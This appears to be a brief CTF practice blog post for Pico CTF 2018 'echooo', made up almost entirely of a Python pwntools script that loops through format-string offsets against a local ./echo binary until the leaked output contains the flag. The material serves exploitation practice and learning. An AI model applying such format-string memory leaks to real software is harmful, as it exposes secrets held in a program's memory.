System/Pwnable Practice

Pico CTF 2018 echooo

JeonYoungSin 2019. 8. 4. 23:34

exploit.py


from pwn import *

  

p = process("./echo")


for i in range(1,100):

    try:

        p = process("./echo")

        payload ="%"+str(i)+"$s"

        p.sendlineafter("> ",payload)

        result = p.recv(2048)

        if "picoCTF" in result:

            print result

            break

        p.close()

    except:

        print "fail"

        p.close()